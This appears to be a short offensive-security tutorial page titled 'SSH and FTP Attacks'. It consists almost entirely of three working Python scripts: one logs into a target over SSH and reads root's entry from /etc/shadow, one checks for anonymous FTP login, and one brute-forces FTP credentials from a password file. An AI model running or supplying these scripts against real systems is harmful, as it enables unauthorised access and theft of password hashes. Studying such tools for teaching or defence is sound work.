SSH and FTP Attacks

SSH Logger

#!/usr/bin/python

import pexpect

PROMPT = ['# ','>>> ','> ','\$ ']

def send_command(child,command):
	child.sendline(command)
	child.expect(PROMPT)
	print (child.before)

def connect(user,host,password):
	ssh_newkey = 'Are you sure you want to continue connecting'
	connectionString = 'ssh -oHostKeyAlgorithms=+ssh-dss' + user + '@' + host
	child = pexpect.spawn(connectionString)
	ret = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword: '])
	if ret == 0:
		print ('[-] Error Connecting')
		return
	if ret == 1:
		child.sendline('yes')
		ret = child.expect([pexpect.TIMEOUT,'[P|p]assword: '])
		if ret == 0:
			print ('[-] Error connecting')
			return
	child.sendline(password)
	child.expect(PROMPT)
	return child

def main():
	host = input("Enter the host to target: ")
	user = input("Enter SSH username: ")
	password = input("Enter SSH password: ")

	child = connect(user,host,password)
	send_command(child,'cat /etc/shadow | grep root;ps')

main()

Anonymous FTP Login

#!/usr/bin/python

import ftplib

def anonLogin(hostname):
	try:
		ftp = ftplib.FTP(hostname)
		ftp.login('anonymous','anonymous')
		print ("[+] " + hostname + " FTP Anonymous logon succeeded.")
		ftp.quit()
		return True
	except Exception:
		print ("[-] " + hostname + " FTP Anonymous logon failed.")
		

def main():
	host = input("Enter the IP address: ")
	anonLogin(host)

main()

Dictionary attack on FTP

#!/usr/bin/python

import ftplib

def bruteLogin(hostname,passwdFile):
	try:
		pFile = open(passwdFile, "r")
	except:
		print ("[!!] File doesn't exist")
	for line in pFile.readlines():
		userName = line.split(':')[0]
		passWord = line.split(':')[1].strip('\n')
		print("[+] Trying: " + userName + "/" + passWord)
		try:
			ftp = ftplib.FTP(hostname)
			login = ftp.login(userName, passWord)
			print("[+] Login suceeded with: " + userName + "/" + passWord)
			ftp.quit()
			return(userName,passWord)
		except:
			pass
	print("[-] Login was not possible")

def main():
	host = input("[*] Enter target IP: ")
	passwdFile = input("[*] Enter User/Password file path: ")
	bruteLogin(host, passwdFile)

main()

Last updated